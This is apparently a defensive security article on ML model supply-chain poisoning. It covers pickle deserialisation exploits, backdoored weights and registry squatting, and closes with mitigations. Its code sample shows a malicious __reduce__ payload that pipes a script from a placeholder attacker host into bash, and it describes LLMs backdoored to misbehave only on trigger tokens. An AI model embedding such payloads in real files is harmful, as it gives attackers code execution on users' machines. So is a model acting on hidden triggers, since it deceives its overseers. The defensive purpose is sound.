AI Model Supply Chain Poisoning: Pickle Exploits, Hugging Face Risks, and Backdoored Weights

The Core Problem

The ML ecosystem built its dependency model on top of Python's pickle serialisation format — and that was a catastrophic security decision that nobody wants to talk about. Every torch.load(), every pickle.loads(), every joblib.load() on an untrusted file is a remote code execution vulnerability waiting to trigger.

In 2023 and 2024 alone, researchers found hundreds of malicious models on Hugging Face Hub, PyPI, and other registries. These were not abstract proofs of concept — they were uploaded, indexed, got stars, and were downloaded by real organisations before being detected and removed. The gap between upload and takedown is measured in hours to days.

The supply chain attack surface for ML is broader than for traditional software because organisations routinely pull model weights from public repositories, fine-tune them on proprietary data, and deploy them to production — often without a security review that would be standard for any npm or PyPI dependency.

No review gate: The average organisation has stricter controls over which npm packages enter their codebase than which model weights enter their ML infrastructure. This asymmetry is actively exploited.

How Pickle Exploits Work

Python's pickle format is a stack-based virtual machine. It can encode arbitrary Python object graphs, including references to callables. When unpickled, those callables are invoked. There is no sandbox, no safe mode, no way to restrict execution within the standard library's pickle.loads().

The exploit primitive is __reduce__. Any Python class can implement this method to control how it is serialised and deserialised. A malicious model author embeds a class with a custom __reduce__ that returns a callable — typically os.system or subprocess.Popen — and arguments.

# What the malicious model's __reduce__ looks like internally
import os, pickle

class Exploit:
    def __reduce__(self):
        # This tuple tells pickle: call os.system with this string
        return (os.system, ("curl https://attacker.example/shell.sh | bash",))

payload = pickle.dumps(Exploit())
# Saving this into a .pt file alongside legitimate model weights
# torch.load() triggers execution on the victim's machine
            

The attack is embedded in the checkpoint file alongside legitimate tensors. When the victim calls torch.load("model.pt"), the entire pickle stream is deserialised — legitimate weights and the exploit payload together. There is no warning, no prompt, no visible side effect beyond the command running in the background.

Formats Affected

PyTorch .pt / .pth files — use pickle by default since PyTorch 1.x. Every torch.save() produces a pickle-based file.
scikit-learn / joblib files — joblib.dump() produces pickle-based archives. Widely used for tabular ML models.
Keras H5 (legacy) — older .h5 files can embed arbitrary Python lambdas in custom layer definitions.
Pickle .pkl files — anything stored as raw pickle, including pandas DataFrames, custom preprocessors, and feature encoders.

SafeTensors — the format developed specifically to address this — stores only tensor data in a flat binary layout. It explicitly cannot encode callables. It is the only storage format that is safe to load from untrusted sources.

Weight-Level Backdoors

Beyond the code-execution vector, there is a subtler attack class that doesn't require pickle at all: backdoored weights. A model can be trained or fine-tuned to behave correctly on standard inputs while producing specific outputs when it encounters a trigger pattern.

BadNets, the seminal 2017 paper, showed this for image classifiers — a yellow square patch in the corner of any image causes the model to always output "stop sign" regardless of the actual content. Modern variants are far more sophisticated: triggers embedded in frequency space invisible to the human eye, semantic triggers that activate on specific word combinations in NLP models, or gradient-based triggers impossible to detect without access to the original training data.

The practical threat in 2026 is a fine-tuned LLM that behaves perfectly during evaluation but leaks internal context, produces biased outputs, or inserts malicious content when specific tokens appear in the prompt. Detecting this requires either access to the training process or extensive red-teaming with knowledge of plausible trigger patterns — neither of which happens in a typical "download and deploy" workflow.

The subtle version is worse: Pickle exploits make noise — endpoint security tools may catch the outbound connection. A backdoored model causes incorrect behaviour that looks like a model quality problem, not a security incident. It may take months to identify as intentional.

Public Registry Risks

Hugging Face Hub hosts over 900,000 models as of early 2026. The platform introduced a malware scanning capability in 2023 using ClamAV and a custom pickle scanner, but scanning runs asynchronously after upload — there is a window between model availability and scan completion. More importantly, the scanner catches known-bad patterns, not novel exploits.

The attack surface is compounded by namespace squatting. Legitimate model names like bert-base-uncased, gpt2, and llama-3-8b are owned by their respective organisations, but there are thousands of similar-looking names — bert-base-uncaseed, llama-3-8b-instruct-v2 — that may be controlled by attackers. An organisation's internal tooling that constructs model identifiers programmatically can be targeted via these lookalike names.

UploadAttacker uploads poisoned model with plausible name

→

IndexModel appears in search results, gets downloads

→

DownloadVictim's ML pipeline pulls model automatically

→

Executetorch.load() triggers embedded payload on load

Detection and Scanning

Several tools exist for scanning model files before loading. None is complete, but they raise the bar significantly:

ModelScan (open source by ProtectAI) — scans pickle-based model files for dangerous opcodes and known exploit patterns. Integrates into CI/CD and pre-load hooks.
Hugging Face's built-in scanner — runs on Hub uploads, marks models as safe or unsafe, but with the async gap noted above.
Custom pickle allow-listing — subclassing pickle.Unpickler and overriding find_class() to allow only tensor-related types blocks the exploit primitive entirely. PyTorch 2.x supports this via torch.load(weights_only=True).

The weights_only=True flag in torch.load() is the single most impactful change you can make today. It restricts deserialisation to a whitelist of tensor types and raises an exception on any other pickle opcode. It should be the default in any loading code that touches external models.

# Safe: restricts deserialisation to tensor types only
model_state = torch.load("model.pt", weights_only=True)

# Unsafe: equivalent to executing an untrusted binary
model_state = torch.load("model.pt")  # default, weights_only=False
            

Mitigations That Work

Prefer SafeTensors: For any model loaded from an external source, require SafeTensors format. It cannot encode callables. Hugging Face supports it natively; most model authors publish both formats.
Pin model hashes: Store the SHA-256 hash of every external model file and verify it before loading. Treat models like locked dependencies — not latest-by-default pulls.
Use weights_only=True: In all torch.load() calls touching external sources. Make this a lint rule that fails CI.
Scan before load: Run ModelScan or equivalent in your CI pipeline against any model added to your model registry. Treat a failed scan as a build failure.
Private model registry: Maintain an internal registry that mirrors only vetted, scanned models. Prevent direct production access to public registries.
Sandboxed loading environment: Load external models in a sandboxed environment (gVisor, Firecracker VM) with no network access and read-only filesystem access to sensitive paths. Even if an exploit fires, it cannot reach your infrastructure.
Monitor for anomalous network connections: A pickle payload that runs successfully will almost always make an outbound connection. ML training and inference hosts should have very restrictive egress rules — this makes the callback visible.

The key shift: Start treating model checkpoints with the same security posture as binary executables. You wouldn't run an untrusted binary in production without scanning and sandboxing. A pickle-based model file deserves the same treatment.

AI Model Supply Chain Poisoning:When Your Model Loads, It Executes.